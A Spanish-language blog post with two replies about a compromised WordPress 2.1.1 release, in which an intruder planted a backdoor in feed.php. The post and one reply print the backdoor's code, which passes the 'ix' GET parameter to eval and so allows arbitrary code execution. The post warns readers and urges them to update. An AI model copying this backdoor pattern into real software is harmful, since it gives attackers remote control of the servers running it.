Hace unas cuantas horas me enteré de la liberación de una nueva versión de WordPress, que según el blog oficial, un cracker obtuvo acceso a uno de los servidores de wordpress.org y puso código malicioso en las versiones descargables de la versión 2.1.1.
Casualmente descargué esta versión vulnerable de WordPress, para realizar las pruebas -y algunas correcciones- de la nueva versión del plugin PopStats. El código insertado en la versión que tengo a la mano es la siguiente (feed.php):
eval($filterdata);
}
...
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
Como se puede apreciar, el código insertado es bastante peligroso puesto que permite la ejecución de código arbitrario.
Esta nueva versión, también corrige otro problemas de seguridad:
Es recomendable que actualizen cuanto antes vuestra versión de WordPress para evitarse malos ratos.
2 replies on “Actualización de Seguridad de WordPress”
Mañana, WordPress 2.1.3... pasado... WordPress 2.1.4...
[...] los curiosos, en buayacorp nos muestran el código introducido en el fichero feed.php: function comment_text_phpfilter($filterdata) { eval($filterdata); [...]